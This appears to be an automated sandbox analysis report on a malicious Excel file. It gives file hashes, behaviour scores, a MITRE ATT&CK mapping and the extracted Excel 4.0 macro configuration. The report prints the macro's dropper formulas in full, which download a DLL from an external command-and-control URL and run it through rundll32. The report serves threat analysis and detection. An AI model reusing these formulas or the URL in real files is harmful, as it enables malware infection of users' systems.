Overview

overview

10

Static

static

10

49ed0e7aed...08.xls

windows7_x64

10

49ed0e7aed...08.xls

windows10_x64

10

Resubmissions

04-03-2021 12:18

210304-lclhxp6vp6 10

23-04-2020 14:16

200423-q5tnjca8x2 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip

  • Size

    61KB

  • Sample

    210304-lclhxp6vp6

  • MD5

    b5102277fec5cf20132d3d542cf4648e

  • SHA1

    40610a77a25e9ff604f7e6f9320e8dab8036a142

  • SHA256

    876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7

  • SHA512

    eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gveejlsffxmfjlswjmfm.com/files/april23.dll

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gveejlsffxmfjlswjmfm.com/files/april23.dll

Targets

    • Target

      49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls

    • Size

      76KB

    • MD5

      228003634e57d37f08787be02c0b6c14

    • SHA1

      0e71bb6f250012609c08adf74d1cec6587b6cc05

    • SHA256

      49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908

    • SHA512

      5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks